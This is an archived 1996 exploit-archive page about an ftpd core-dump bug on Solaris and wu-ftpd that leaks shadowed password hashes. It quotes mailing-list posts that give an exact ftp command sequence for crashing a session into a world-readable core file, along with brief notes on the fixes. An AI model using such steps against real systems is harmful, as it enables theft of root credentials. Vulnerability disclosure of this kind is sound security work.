Solaris (and others) ftpd core dump bug

Summary
Description:Solaris ftpd (as well as others) can be made to core dump and divulge shadowed passwords
Author:Unknown
Compromise:Can obtained crypt()ed root password
Vulnerable Systems:Solaris (at least 2.5) and others including wu.ftpd. If enclosed doesn't work, try killing the process yourself.
Date:15 October 1996
Notes:See addendum
Details

Exploit:

From: Martin Rex (martin.rex@sap-ag.de)
Date: Tue, 15 Oct 1996 18:14:08 -0400 

      
James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?

Killing from the command line doesn't seem to work, but:

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin

PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
    so the seem to have used the proposed fix

         Checking for "pw != NULL"

    So this proposal was simple and obvious   ... and incomplete. :)

Addendum: Other ftpd bugs:

FromVadim Kolontsov (vadim@tversu.ac.ru)
Date: Tue, 15 Oct 1996 08:41:40 +0300 


Hello,

  wuftpd can create core dump in two following situation too (yes, dump
will contain some subset of shadowed passwords):

1) "pasv" given when user not logged in
   (caused by error in passive())

2) more than 100 arguments to any executable command (for example, "list")
   (caused by error in ftpd_popen())

  First error presents in almost all version of bsd's ftpd, wu-ftpd and
derived. Second error presents in all versions of bsd's ftpd, wu-ftpd and
derived (as far as I know).
  Bugfixes are simple. Checking for "pw != NULL" in first case, and
checking for "argc < 100" in another one (see sources).

Best regards, Vadim.

P.S. By the way, who knows e-mail of wu-ftpd developer? Mail me, pls...
--------------------------------------------------------------------------
Vadim Kolontsov                                          SysAdm/Programmer
Tver Regional Center of New Information Technologies          Networks Lab
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault